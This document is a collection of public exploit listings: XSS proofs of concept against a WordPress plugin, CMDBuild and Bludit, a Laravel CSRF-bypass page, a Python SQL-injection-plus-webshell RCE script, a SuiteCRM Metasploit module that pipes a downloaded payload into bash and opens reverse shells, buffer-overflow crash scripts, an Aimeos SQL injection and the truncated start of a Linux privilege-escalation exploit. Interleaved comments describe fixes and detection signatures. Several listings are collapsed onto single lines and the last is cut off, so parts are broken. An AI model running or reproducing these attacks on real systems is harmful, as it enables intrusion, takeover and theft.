
# Exploit Title: WordPress Plugin Contact Form to Email 1.3.24 - Stored Cross Site Scripting (XSS) (Authenticated)
# Date: 11/11/2021
# Exploit Author: Mohammed Aadhil Ashfaq
# Vendor Homepage: https://form2email.dwbooster.com/
# Version: 1.3.24
# Tested on: wordpress

POC
1. Click Contact form to Email
http://192.168.111.129/wp-admin/admin.php?page=cp_contactformtoemail
2. Create new form name with <script>alert(1)</script>
3. Click Publish
4. XSS has been triggered
http://192.168.111.129/wp-admin/admin.php?page=cp_contactformtoemail&pwizard=1&cal=4&r=0.8630795030649687
5. Open a different browser in which you are logged in to WordPress, paste the URL and
press Enter. The XSS will trigger.
            
# Exploit Title: Online Learning System 2.0 - Remote Code Execution (RCE)
# Date: 15/11/2021
# Exploit Author: djebbaranon
# Vendor Homepage: https://github.com/oretnom23
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/elearning_v2_0.zip
# Version: 2.0
# Tested on: Kali linux / Windows 10
# CVE : CVE-2021-42580

#!/usr/bin/python3
import os
import time
import argparse
import requests
import sys
from colorama import init
from colorama import Fore
from colorama import Back
from colorama import Style
# colorama: autoreset restores the default terminal style after each print, so
# the Fore/Style colours used below do not bleed into the following lines.
init(autoreset=True)
def banner():
	"""Print the tool's ASCII-art banner and the author's handles to stdout."""
	print('''

 _____       _ _              _                       _                     _____  ______ _____ _____ 
|  _  |     | (_)            | |                     (_)                   / __  \ | ___ /  __ |  ___|
| | | |_ __ | |_ _ __   ___  | | ___  __ _ _ __ _ __  _ _ __   __ _  __   _`' / /' | |_/ | /  \| |__  
| | | | '_ \| | | '_ \ / _ \ | |/ _ \/ _` | '__| '_ \| | '_ \ / _` | \ \ / / / /   |    /| |   |  __| 
\ \_/ | | | | | | | | |  __/ | |  __| (_| | |  | | | | | | | | (_| |  \ V /./ /___ | |\ \| \__/| |___ 
 \___/|_| |_|_|_|_| |_|\___| |_|\___|\__,_|_|  |_| |_|_|_| |_|\__, |   \_/ \_____/ \_| \_|\____\____/ 
                                                               __/ |                                  
                                                              |___/                                   
		Written by djebbaranon 
		twitter :  @dj3bb4ran0n1
		zone-h : http://zone-h.org/archive/notifier=djebbaranon
''')
# Runs at import time: the banner is printed before any argument parsing.
banner()
def my_args():
	"""Parse the command line and return the argparse namespace.

	The namespace carries ``url`` (str), ``range`` (int) and ``command`` (str).
	All three options are required, so argparse exits with a usage error when
	any of them is missing.  This is called more than once elsewhere in the
	script; each call re-parses ``sys.argv``.
	"""
	cli = argparse.ArgumentParser(epilog="Example : python3 -u http://localhost/elearning -r 1000 -c whoami")
	# (short flag, long flag, value type, help text) -- all required.
	options = (
		("-u", "--url", str, "url of target"),
		("-r", "--range", int, "range for bruteforce the webshell name"),
		("-c", "--command", str, "command to execute"),
	)
	for short_flag, long_flag, value_type, help_text in options:
		cli.add_argument(short_flag, long_flag, type=value_type, required=True, help=help_text)
	return cli.parse_args()
def login_with_sqli_login_bypass(user,passw):
	"""POST ``user``/``passw`` to the login endpoint and keep the session.

	Side effects: assigns the module globals ``session``, ``url`` (re-read from
	the command line via ``my_args()``) and ``cookies`` for later use by ``main``.
	The "logged in" message is printed whether or not the login worked: the
	response status is never checked, and ``requests.HTTPError`` is normally only
	raised by ``raise_for_status()``, which is not called.  Connection errors are
	not ``HTTPError`` and propagate out of this function.

	Defender notes: the call site passes an SQL-injection string as both fields,
	which indicates the login handler interpolates the raw POST values into its
	query.  The fix is a parameterised query plus a credential check that does
	not depend on the row count; the literal ``' or 1=1`` in login POST bodies
	is the detection signature.
	"""
	global session
	global url
	global cookies
	url = my_args().url
	session = requests.Session()
	data = {
	"username" : user,
	"password" : passw,
	}
	try:
		# verify=False disables TLS certificate validation for this request.
		response = session.post(url + "/classes/Login.php?f=login",data=data,verify=False)
		print( Fore.GREEN + "[+] Logged in succsusfully")
		cookies = response.cookies.get_dict()
		# Announces the cookie but does not print its value.
		print("[+] your cookie : ")
	except requests.HTTPError as exception:
		print(Fore.RED + "[-] HTTP Error : {}".format(exception))
		sys.exit(1)
# Runs at import time, right after the definition: both credential fields are
# the same SQL-injection string, so this only passes authentication where the
# login handler builds its query from the raw values.  Argument parsing
# (my_args) happens inside this call.
login_with_sqli_login_bypass("' or 1=1 -- -","' or 1=1 -- -")
def main(shell_name,renamed_shell):
	"""Upload a PHP file through the faculty "img" field, locate it, and run one command.

	Args:
		shell_name: file name sent in the multipart ``img`` part.
		renamed_shell: unused.

	Relies on the module globals ``session``, ``url`` and ``cookies`` set by
	``login_with_sqli_login_bypass``.  ``my_args()`` is re-parsed twice here
	rather than passed in.

	Defender notes: the weakness exercised is an image upload that keeps the
	client-supplied extension and stores the file under the web root (it is
	later fetched as ``/uploads/Favatar_<n>.php``).  Fixes: validate the upload
	server-side (extension allow-list, re-encode the image), generate the stored
	name, and serve the upload directory without script execution.  Detection:
	multipart POSTs to ``/classes/Master.php?f=save_faculty`` whose ``img`` part
	has a ``.php`` name or a ``<?php`` body, GETs to ``/uploads/*.php?cmd=``, and
	the literal marker ``nikmok`` in responses.
	"""
	try:
		# Faculty record fields as submitted by the form (presumably what
		# save_faculty expects -- not verified here).
		payload ={
			"id" : "",
			"faculty_id" : "test",
			"firstname" : "test",
			"lastname" : "test",
			"middlename" : "fsdfsd",
			"dob" : "2021-10-29",
			"gender": "Male",
			"department_id" : "1",
			"email" : "zebi@gmail.com",
			"contact" : "zebii",
			"address" :  "zebii",	
		}
		# The "img" part: client-chosen name, PHP body, generic content type.
		files = {
			"img" :
				(
					shell_name,
					"<?php echo \"<pre><h1>nikmok</h1>\" . shell_exec($_REQUEST['cmd']) . \"</pre>\"?>",
					"application/octet-stream",
					)
		}
		vunlerable_file = "/classes/Master.php?f=save_faculty"
		print("[*] Trying to upload webshell ....")
		# The upload response is not inspected (response_2 is unused).
		response_2 = session.post(url + vunlerable_file,data=payload,cookies=cookies,files=files)
		print("[+] trying to bruteforce the webshell ....")
		rangee = my_args().range
		# Probe Favatar_0.php .. Favatar_<range-1>.php; a 200 whose body holds
		# the marker means the uploaded file was found.
		for i in range(0,rangee):
			try:
				with requests.get(url + "/uploads/Favatar_" + str(i) + ".php?cmd=whoami",allow_redirects=False) as response3:
					if "nikmok" in response3.text and response3.status_code == 200:
						print("\n" + Fore.GREEN + "[+] shell found : " + response3.url +"\n")
						break
						# Unreachable: follows the break, so shell.txt is never written.
						with open("shell.txt",mode="w+") as writer:
							writer.write(response3.url)
					else:
						print( Fore.RED + "[-] shell not found : " + response3.url)
			except requests.HTTPError as exception2:
				print("[-] HTTP Error : {0} ".format(exception2))
	except requests.HTTPError as error:
		# No "{}" in the format string, so the error text is dropped from the message.
		print("[-] HTTP Error : ".format(error))
	command = my_args().command
	# response3 is only bound if at least one probe completed; otherwise this
	# raises NameError.  If no probe matched, the last probed URL is reused.
	with requests.get(response3.url.replace("whoami",command)) as response4:
		print("[*] Executing {} ....".format(command))
		# The request has already returned at this point; the sleep only delays the output.
		time.sleep(3)
		print("\n" + Style.BRIGHT + Fore.GREEN + response4.text)
# Entry point, run at import time; the second argument is unused by main.
main("hackerman.php","")
            
# Exploit Title: PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF)
# Date: 14/11/2021
# Exploit Author: Hosein Vita
# Vendor Homepage: https://laravel.com/
# Software Link: https://laravel.com/docs/4.2
# Version: Laravel Framework 8.70.1
# Tested on: Windows/Linux

# Description: We can bypass Laravel's image file upload check to upload arbitrary files to the web server,
# which lets us run arbitrary JavaScript and bypass the CSRF token. For more information read https://hosein-vita.medium.com/laravel-8-x-image-upload-bypass-zero-day-852bd806019b

# Steps to reproduce:
1- Use the HxD tool and add FF D8 FF E0 at the very beginning of your file
2- Use the code below to bypass the CSRF token

ÿØÿà<html>
<head>
<title>Laravel Csrf Bypass</title>
</head>
<body>
<script>
function submitFormWithTokenJS(token) {
    // POST the token read from the upload page to POST_URL, in the `_token`
    // field that Laravel's CSRF middleware checks, together with placeholder
    // form fields.  POST_URL is a global declared with `var` further down the
    // page and is read here at call time.  The request is accepted only because
    // this HTML runs on the application's own origin -- it was stored by the
    // image upload and is served from the same host.
    var xhr = new XMLHttpRequest();
    xhr.open("POST", POST_URL, true);

    // Send the proper header information along with the request
    xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");

    // This is for debugging and can be removed
    xhr.onreadystatechange = function() {
        if(xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
            console.log(xhr.responseText);
        }
    }
	//
    xhr.send("_token=" + token + "&desiredParameter=desiredValue");
}

function getTokenJS() {
    // Fetch /image-upload from the same origin, take its first <input> (assumed
    // to be the CSRF token field), show the value, and pass it on to
    // submitFormWithTokenJS.  Defender view: the read succeeds only because the
    // uploaded file is served from the application's origin; hosting uploads on
    // a separate origin, or returning them with Content-Disposition: attachment
    // and X-Content-Type-Options: nosniff, keeps the token out of reach of an
    // uploaded document.
    var xhr = new XMLHttpRequest();
    // This tells it to return it as a HTML document
    xhr.responseType = "document";
    // true on the end of here makes the call asynchronous
	//Edit the path as you want
    xhr.open("GET", "/image-upload", true);
    xhr.onload = function (e) {
        if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
            // Get the document from the response
            // NOTE(review): `page` and `input` are assigned without var/let and
            // therefore become implicit globals (the script is not in strict mode).
            page = xhr.response
            // Get the input element
            input = page.getElementsByTagName("input")[0];
            // Show the token
            alert("The token is: " + input.value);
            // Use the token to submit the form
            submitFormWithTokenJS(input.value);
        }
    };
    // Make the request
    xhr.send(null);
}
// First call.  POST_URL is a hoisted `var`, so it is still undefined when this
// call starts; the XHR is asynchronous, so by the time onload fires the
// assignment below has run.
getTokenJS();

var POST_URL="/"
// Second call: the page issues two token requests and therefore two POSTs.
getTokenJS();

</script>
</html>

3- Save it as Html file and upload it.
            
# Exploit Title: CMDBuild 3.3.2 - 'Multiple' Cross Site Scripting (XSS)
# Date: 15/11/2021
# Exploit Author: Hosein Vita
# Vendor Homepage: https://www.cmdbuild.org
# Software Link: https://www.cmdbuild.org/en/download/latest-version
# Version: CMDBuild 3.3.2
# Tested on: Linux

Summary:

Multiple stored cross-site scripting (XSS) vulnerabilities in Tecnoteca CMDBuild 3.3.1 allow remote attackers to inject arbitrary web script or HTML via a crafted SVG document. The attack vectors include Add Attachment, Add Office, and Add Employee; almost all "Add" sections are affected.

Proof of concepts : 

Stored Xss Example: 

1- Log in to your dashboard as a low-privilege user
2- Click on Basic archives and Employee
3- +Add card Employee
4- Enter your XSS payload in the parameters
5- On the added employee, click on "Open Relation Graph"

POST /cmdbuild/services/rest/v3/classes/Employee/cards?_dc=1636978977758 HTTP/1.1
...
Cmdbuild-Actionid: class.card.new.open
Cmdbuild-Requestid: f487ca06-3678-425f-8606-c6b671145353

Cmdbuild-Clientid: WL3L4mteNCU51FxhSQVzno3K
X-Requested-With: XMLHttpRequest
Content-Length: 302
Connection: close

{"_type":"Employee","_tenant":"","Code":"\"><img src=x onerror=alert(1)>","Description":null,"Surname":"\"><img src=x onerror=alert(1)>","Name":"\"><img src=x onerror=alert(1)>","Type":null,"Qualification":null,"Level":null,"Email":null,"Office":null,"Phone":null,"Mobile":null,"Fax":null,"State":null}


------------------------------------------------------------------------


File upload Xss example:

1-Click on Basic archives
2-Click on Workplace - + Add card Workplace
3-Select "attachments" icon - +Add attachment + image
4-Upload your svg file with xss payload
5-Click on preview and Right click open in new tab



Request: 
POST /cmdbuild/services/rest/v3/classes/Workplace/cards/271248/attachments HTTP/1.1
Cmdbuild-Actionid: class.card.attachments.open

-----------------------------269319782833689825543405205260
Content-Disposition: form-data; name="file"; filename="kiwi.svg"
Content-Type: image/svg+xml

<?xml version="1.0" encoding="utf-8"?>
<!-- Generator: Adobe Illustrator 16.0.4, SVG Export Plug-In . SVG Version: 6.00 Build 0)  -->
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"
	 width="612px" height="502.174px" viewBox="0 65.326 612 502.174" enable-background="new 0 65.326 612 502.174"
	 xml:space="preserve">
<ellipse fill="#C6C6C6" cx="283.5" cy="487.5" rx="259" ry="80"/>
<path id="bird" d="M210.333,65.331C104.367,66.105-12.349,150.637,1.056,276.449c4.303,40.393,18.533,63.704,52.171,79.03
	c36.307,16.544,57.022,54.556,50.406,112.954c-9.935,4.88-17.405,11.031-19.132,20.015c7.531-0.17,14.943-0.312,22.59,4.341
	c20.333,12.375,31.296,27.363,42.979,51.72c1.714,3.572,8.192,2.849,8.312-3.078c0.17-8.467-1.856-17.454-5.226-26.933
	c-2.955-8.313,3.059-7.985,6.917-6.106c6.399,3.115,16.334,9.43,30.39,13.098c5.392,1.407,5.995-3.877,5.224-6.991
	c-1.864-7.522-11.009-10.862-24.519-19.229c-4.82-2.984-0.927-9.736,5.168-8.351l20.234,2.415c3.359,0.763,4.555-6.114,0.882-7.875
	c-14.198-6.804-28.897-10.098-53.864-7.799c-11.617-29.265-29.811-61.617-15.674-81.681c12.639-17.938,31.216-20.74,39.147,43.489
	c-5.002,3.107-11.215,5.031-11.332,13.024c7.201-2.845,11.207-1.399,14.791,0c17.912,6.998,35.462,21.826,52.982,37.309
	c3.739,3.303,8.413-1.718,6.991-6.034c-2.138-6.494-8.053-10.659-14.791-20.016c-3.239-4.495,5.03-7.045,10.886-6.876
	c13.849,0.396,22.886,8.268,35.177,11.218c4.483,1.076,9.741-1.964,6.917-6.917c-3.472-6.085-13.015-9.124-19.18-13.413
	c-4.357-3.029-3.025-7.132,2.697-6.602c3.905,0.361,8.478,2.271,13.908,1.767c9.946-0.925,7.717-7.169-0.883-9.566
	c-19.036-5.304-39.891-6.311-61.665-5.225c-43.837-8.358-31.554-84.887,0-90.363c29.571-5.132,62.966-13.339,99.928-32.156
	c32.668-5.429,64.835-12.446,92.939-33.85c48.106-14.469,111.903,16.113,204.241,149.695c3.926,5.681,15.819,9.94,9.524-6.351
	c-15.893-41.125-68.176-93.328-92.13-132.085c-24.581-39.774-14.34-61.243-39.957-91.247
	c-21.326-24.978-47.502-25.803-77.339-17.365c-23.461,6.634-39.234-7.117-52.98-31.273C318.42,87.525,265.838,64.927,210.333,65.331
	z M445.731,203.01c6.12,0,11.112,4.919,11.112,11.038c0,6.119-4.994,11.111-11.112,11.111s-11.038-4.994-11.038-11.111
	C434.693,207.929,439.613,203.01,445.731,203.01z"/>
	<script>alert(1)</script>
</svg>
            

Bludit 3.13.1 - 'username' Cross Site Scripting (XSS)

# Exploit Title: Bludit 3.13.1 - 'username' Cross Site Scripting (XSS) # Date: 19/10/2021 # Exploit Author: Vasu (tamilan_mkv) # Vendor Homepage: https://www.bludit.com # Software Link: https://www.bludit.com/releases/bludit-3-13-1.zip # Version: bludit-3-13-1 # Tested on: kali linux # CVE : CVE-2021-35323 ### Steps to reproduce 1. Open the login page http://localhost:800/admin/login; 2. In the username field enter ``admin"><img src=x onerror=alert(1)>`` and enter the password 3. Trigger the malicious JavaScript code
# Review notes (defender view).  This listing has been collapsed onto a few
# physical lines; the Ruby '#' comments inside each line swallow the code that
# follows them, so the text below is not loadable as a module without restoring
# the line breaks.  No code has been changed here.
#
# What the module describes doing: with an administrative SuiteCRM account it
# changes the logger file extension through the Configurator (the extension
# check is case-sensitive, so '.pHp' passes), writes PHP into the log by saving
# it as a user's last name, and then requests the log file
# (CVE-2021-42840; CVE-2020-28328 covers the earlier blank-extension variant).
# The check method treats versions <= 7.11.18 as affected.
#
# Mitigation: update to a release above 7.11.18, keep administrative accounts
# few and strongly authenticated (the module needs USER/PASS with admin rights),
# and keep the log file outside the web root.  Detection: Configurator
# SaveConfig requests that change logger_file_ext away from '.log', last_name
# values containing '<?php', and HTTP requests for the log file with a .php
# extension in any letter case; the module itself declares ARTIFACTS_ON_DISK and
# IOC_IN_LOGS side effects and a RESTORECONF clean-up step.
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::CmdStager include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'SuiteCRM Log File Remote Code Execution', 'Description' => %q{ This module exploits an input validation error on the log file extension parameter. It does not properly validate upper/lower case characters. Once this occurs, the application log file will be treated as a php file. The log file can then be populated with php code by changing the username of a valid user, as this info is logged. The php code in the file can then be executed by sending an HTTP request to the log file. A similar issue was reported by the same researcher where a blank file extension could be supplied and the extension could be provided in the file name. This exploit will work on those versions as well, and those references are included. }, 'License' => MSF_LICENSE, 'Author' => [ 'M. Cory Billington' # @_th3y ], 'References' => [ ['CVE', '2021-42840'], ['CVE', '2020-28328'], # First CVE ['EDB', '49001'], # Previous exploit, this module will cover those versions too. Almost identical issue. 
['URL', 'https://theyhack.me/CVE-2020-28320-SuiteCRM-RCE/'], # First exploit ['URL', 'https://theyhack.me/SuiteCRM-RCE-2/'] # This exploit ], 'Platform' => %w[linux unix], 'Arch' => %w[ARCH_X64 ARCH_CMD ARCH_X86], 'Targets' => [ [ 'Linux (x64)', { 'Arch' => ARCH_X64, 'Platform' => 'linux', 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp' } } ], [ 'Linux (cmd)', { 'Arch' => ARCH_CMD, 'Platform' => 'unix', 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } } ] ], 'Notes' => { 'Stability' => [CRASH_SAFE], 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS], 'Reliability' => [REPEATABLE_SESSION] }, 'Privileged' => true, 'DisclosureDate' => '2021-04-28', 'DefaultTarget' => 0 ) ) register_options( [ OptString.new('TARGETURI', [true, 'The base path to SuiteCRM', '/']), OptString.new('USER', [true, 'Username of user with administrative rights', 'admin']), OptString.new('PASS', [true, 'Password for administrator', 'admin']), OptBool.new('RESTORECONF', [false, 'Restore the configuration file to default after exploit runs', true]), OptString.new('WRITABLEDIR', [false, 'Writable directory to stage meterpreter', '/tmp']), OptString.new('LASTNAME', [false, 'Admin user last name to clean up profile', 'admin']) ] ) end def check authenticate unless @authenticated return Exploit::CheckCode::Unknown unless @authenticated version_check_request = send_request_cgi( { 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'index.php'), 'keep_cookies' => true, 'vars_get' => { 'module' => 'Home', 'action' => 'About' } } ) return Exploit::CheckCode::Unknown("#{peer} - Connection timed out") unless version_check_request version_match = version_check_request.body[/ Version \s \d{1} # Major revision \. \d{1,2} # Minor revision \. \d{1,2} # Bug fix release /x] version = version_match.partition(' ').last if version.nil? || version.empty? 
about_url = "#{full_uri}#{normalize_uri(target_uri, 'index.php')}?module=Home&action=About" return Exploit::CheckCode::Unknown("Check #{about_url} to confirm version.") end patched_version = Rex::Version.new('7.11.18') current_version = Rex::Version.new(version) return Exploit::CheckCode::Appears("SuiteCRM #{version}") if current_version <= patched_version Exploit::CheckCode::Safe("SuiteCRM #{version}") end def authenticate print_status("Authenticating as #{datastore['USER']}") initial_req = send_request_cgi( { 'method' => 'GET', 'uri' => normalize_uri(target_uri, 'index.php'), 'keep_cookies' => true, 'vars_get' => { 'module' => 'Users', 'action' => 'Login' } } ) return false unless initial_req && initial_req.code == 200 login = send_request_cgi( { 'method' => 'POST', 'uri' => normalize_uri(target_uri, 'index.php'), 'keep_cookies' => true, 'vars_post' => { 'module' => 'Users', 'action' => 'Authenticate', 'return_module' => 'Users', 'return_action' => 'Login', 'user_name' => datastore['USER'], 'username_password' => datastore['PASS'], 'Login' => 'Log In' } } ) return false unless login && login.code == 302 res = send_request_cgi( { 'method' => 'GET', 'uri' => normalize_uri(target_uri, 'index.php'), 'keep_cookies' => true, 'vars_get' => { 'module' => 'Administration', 'action' => 'index' } } ) auth_succeeded?(res) end def auth_succeeded?(res) return false unless res if res.code == 200 print_good("Authenticated as: #{datastore['USER']}") if res.body.include?('Unauthorized access to administration.') print_warning("#{datastore['USER']} does not have administrative rights! 
Exploit will fail.") @is_admin = false else print_good("#{datastore['USER']} has administrative rights.") @is_admin = true end @authenticated = true return true else print_error("Failed to authenticate as: #{datastore['USER']}") return false end end def post_log_file(data) send_request_cgi( { 'method' => 'POST', 'uri' => normalize_uri(target_uri, 'index.php'), 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'keep_cookies' => true, 'headers' => { 'Referer' => "#{full_uri}#{normalize_uri(target_uri, 'index.php')}?module=Configurator&action=EditView" }, 'data' => data.to_s } ) end def modify_system_settings_file filename = rand_text_alphanumeric(8).to_s extension = '.pHp' @php_fname = filename + extension action = 'Modify system settings file' print_status("Trying - #{action}") data = Rex::MIME::Message.new data.add_part('SaveConfig', nil, nil, 'form-data; name="action"') data.add_part('Configurator', nil, nil, 'form-data; name="module"') data.add_part(filename.to_s, nil, nil, 'form-data; name="logger_file_name"') data.add_part(extension.to_s, nil, nil, 'form-data; name="logger_file_ext"') data.add_part('info', nil, nil, 'form-data; name="logger_level"') data.add_part('Save', nil, nil, 'form-data; name="save"') res = post_log_file(data) check_logfile_request(res, action) end def poison_log_file action = 'Poison log file' if target.arch.first == 'cmd' command_injection = "<?php `curl #{@download_url} | bash`; ?>" else @meterpreter_fname = "#{datastore['WRITABLEDIR']}/#{rand_text_alphanumeric(8)}" command_injection = %( <?php `curl #{@download_url} -o #{@meterpreter_fname}; /bin/chmod 700 #{@meterpreter_fname}; /bin/sh -c #{@meterpreter_fname};`; ?> ) end print_status("Trying - #{action}") data = Rex::MIME::Message.new data.add_part('Users', nil, nil, 'form-data; name="module"') data.add_part('1', nil, nil, 'form-data; name="record"') data.add_part('Save', nil, nil, 'form-data; name="action"') data.add_part('EditView', nil, nil, 'form-data; name="page"') 
data.add_part('DetailView', nil, nil, 'form-data; name="return_action"') data.add_part(datastore['USER'], nil, nil, 'form-data; name="user_name"') data.add_part(command_injection, nil, nil, 'form-data; name="last_name"') res = post_log_file(data) check_logfile_request(res, action) end def restore action = 'Restore logging to default configuration' print_status("Trying - #{action}") data = Rex::MIME::Message.new data.add_part('SaveConfig', nil, nil, 'form-data; name="action"') data.add_part('Configurator', nil, nil, 'form-data; name="module"') data.add_part('suitecrm', nil, nil, 'form-data; name="logger_file_name"') data.add_part('.log', nil, nil, 'form-data; name="logger_file_ext"') data.add_part('fatal', nil, nil, 'form-data; name="logger_level"') data.add_part('Save', nil, nil, 'form-data; name="save"') post_log_file(data) data = Rex::MIME::Message.new data.add_part('Users', nil, nil, 'form-data; name="module"') data.add_part('1', nil, nil, 'form-data; name="record"') data.add_part('Save', nil, nil, 'form-data; name="action"') data.add_part('EditView', nil, nil, 'form-data; name="page"') data.add_part('DetailView', nil, nil, 'form-data; name="return_action"') data.add_part(datastore['USER'], nil, nil, 'form-data; name="user_name"') data.add_part(datastore['LASTNAME'], nil, nil, 'form-data; name="last_name"') res = post_log_file(data) print_error("Failed - #{action}") unless res && res.code == 301 print_good("Succeeded - #{action}") end def check_logfile_request(res, action) fail_with(Failure::Unknown, "#{action} - no reply") unless res unless res.code == 301 print_error("Failed - #{action}") fail_with(Failure::UnexpectedReply, "Failed - #{action}") end print_good("Succeeded - #{action}") end def execute_php print_status("Executing php code in log file: #{@php_fname}") res = send_request_cgi( { 'uri' => normalize_uri(target_uri, @php_fname), 'keep_cookies' => true } ) fail_with(Failure::NotFound, "#{peer} - Not found: #{@php_fname}") if res && res.code == 404 
register_files_for_cleanup(@php_fname) register_files_for_cleanup(@meterpreter_fname) unless @meterpreter_fname.nil? || @meterpreter_fname.empty? end def on_request_uri(cli, _request) send_response(cli, payload.encoded, { 'Content-Type' => 'text/plain' }) print_good("#{peer} - Payload sent!") end def start_http_server start_service( { 'Uri' => { 'Proc' => proc do |cli, req| on_request_uri(cli, req) end, 'Path' => resource_uri } } ) @download_url = get_uri end def exploit start_http_server authenticate unless @authenticated fail_with(Failure::NoAccess, datastore['USER'].to_s) unless @authenticated fail_with(Failure::NoAccess, "#{datastore['USER']} does not have administrative rights!") unless @is_admin modify_system_settings_file poison_log_file execute_php ensure restore if datastore['RESTORECONF'] end end

Pinkie 2.15 - TFTP Remote Buffer Overflow (PoC)

# Exploit Title: Pinkie 2.15 - TFTP Remote Buffer Overflow (PoC) # Discovered by: Yehia Elghaly # Discovered Date: 2021-11-19 # Vendor Homepage: http://www.ipuptime.net/ # Software Link : http://ipuptime.net/PinkieSetup.zip # Tested Version: 2.15 # Vulnerability Type: Buffer Overflow (DoS) Remote # Tested on OS: Windows XP SP3 - Windows 7 Professional x86 SP1 - Windows 10 x64 # Description: Pinkie 2.15 TFTP Remote Buffer Overflow # Steps to reproduce: # 1. - Download and install Pinkie 2.15 # 2. - Start TFTP Server listening on port 69 # 3. - Run the Script from remote PC/IP # 4. - Crashed #!/usr/bin/env python3 import socket sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) read = ( #Request - read b'\x00\x01' #Static - opcode + b')' * 32768 + #String - source_file (mutant, size=32768, orig val: b'File.bin') b'\x00' #Delim - delim1 b'netascii' #String - transfer_mode b'\x00' #Delim - delim2 ) sock.sendto(read, ('192.168.1.207', 69)) sock.recv(65535) sock.close()

Modbus Slave 7.3.1 - Buffer Overflow (DoS)

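# Exploit Title: Modbus Slave 7.3.1 - Buffer Overflow (DoS)
# Discovered by: Yehia Elghaly
# Discovered Date: 2021-11-19
# Vendor Homepage: https://www.modbustools.com/
# Software Link : https://www.modbustools.com/download/ModbusSlaveSetup32Bit.exe
# Tested Version: 7.3.1 < 7.4.2
# Vulnerability Type: Buffer Overflow (DoS) Local
# Tested on OS: Windows XP SP3 - Windows 7 Professional x86 SP1 - Windows 10 x64
# Description: Modbus Slave 7.3.1 < 7.4.2 Buffer Overflow
# Steps to reproduce:
# 1. - Download and install Modbus Slave
# 2. - Run the python script and it will create modbus.txt file.
# 3. - Modbus Slave 7.3.1 < 7.4.2
# 4. - Connection -> Connect
# 5. - Paste the characters of txt file Registration Key
# 6. - press "ok" button
# 7. - Crashed
#!/usr/bin/python
# Review note: listing restored from a single collapsed line.  Writes the crash
# input -- 736 'A' characters to be pasted into the Registration Key field -- to
# Modbus.txt in the current directory.  The file handle is now released by a
# context manager even if the write fails, and only OS-level errors are caught
# instead of a bare ``except`` that would also hide KeyboardInterrupt.
# Defender view: the registration dialog copies an unbounded string into a
# fixed buffer; the header lists 7.3.1 < 7.4.2 as the affected range, so the
# vendor update is the fix.
exploit = 'A' * 736
try:
    with open("Modbus.txt", "w") as poc_file:
        poc_file.write(exploit)
except OSError:
    print("POC not created")
else:
    print("POC is created")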
# Exploit Title: Aimeos Laravel ecommerce platform 2021.10 LTS - 'sort' SQL injection # Date: 20/11/2021 # Exploit Author: Ilker Burak ADIYAMAN # Vendor Homepage: https://aimeos.org # Software Link: https://aimeos.org/laravel-ecommerce-package # Version: Aimeos 2021.10 LTS # Tested on: MacOSX *Description:* The Aimeos E-Commerce framework Laravel application is vulnerable to SQL injection via the 'sort' parameter on the json api. ==================== 1. SQLi ==================== https://127.0.0.1/default/jsonapi/review?sort=-ctime The "sort" parameter is vulnerable to SQL injection, reveals table and column names. step 1 : Copy json api GET request above. step 2 : Change sort parameter value to -- ---------------------------------------------------------------------- Parameter: sort (GET) Type: error based Title: GET parameter 'sort' appears to be injectable Payload: sort=--
// Review notes (defender view).  This listing is collapsed onto a few physical
// lines and each '//' comment swallows the code that follows it on the same
// line, so it is not compilable as shown; no line breaks have been restored and
// no code has been changed here.  It also differs in several details from the
// referenced original, so it should be read as a sketch rather than a build.
//
// What it describes: CVE-2019-13272, a PTRACE_TRACEME handling bug in Linux
// 4.19 - 5.2.1 (per the header), reached through pkexec and a PolicyKit helper
// binary found either via `pkaction --verbose` or a built-in list (trunks_rec),
// ending in setresuid(0,0,0) and an exec of /bin/bash.
//
// Mitigation is a patched kernel.  The listing's own check_env only warns (it
// does not stop) when the SELinux deny_ptrace boolean is on, when no local
// PolKit session is found via loginctl, or when XDG_SESSION_ID is unset --
// those are the environmental preconditions a defender can remove.  Detection:
// a ptrace attach to a pkexec child, pkexec invoking a backlight/LED helper
// with `--user <name> ... --help`, and an unprivileged session spawning
// /bin/bash as uid 0.
# Exploit Title: Linux Kernel 5.1.x - 'PTRACE_TRACEME' pkexec Local Privilege Escalation (2) # Date: 11/22/21 # Exploit Author: Ujas Dhami # Version: 4.19 - 5.2.1 # Platform: Linux # Tested on: # ~ Ubuntu 19.04 kernel 5.0.0-15-generic # ~ Parrot OS 4.5.1 kernel 4.19.0-parrot1-13t-amd64 # ~ Kali Linux kernel 4.19.0-kali5-amd64 # CVE: CVE-2019-13272 // .... // Original discovery and exploit author: Jann Horn // https://bugs.chromium.org/p/project-zero/issues/detail?id=1903 // Modified exploit code of: BColes // https://github.com/bcoles/kernel-exploits/tree/master/CVE-2019-13272 // .... // ~ Uses the PolKit_Exec frontend. // ~ PolKit_Action is branched. // ~ Search is optimized. // ~ Trunks attain search priority upon execution. // .... // ujas@kali:~$ gcc exploit_traceme.c -o exploit_traceme // ujas@kali:~$ ./exploit_traceme // Welcome to your Arsenal! // accessing variables... // execution has reached EOP. // familiar trunks are been searched ... // trunk helper found: /usr/sbin/mate-power-backlight-helper // helper initiated: /usr/sbin/mate-power-backlight-helper // SUID process is being initiated (/usr/bin/pkexec) ... // midpid is being traced... // midpid attached. // root@kali:/home/ujas# // .... #include <ctype.h> #include <assert.h> #include <conio.h> #include <stdio.h> #include <sys/syscall.h> #include <sys/stat.h> #include <fcntl.h> #include <sched.h> #include <stddef.h> #include 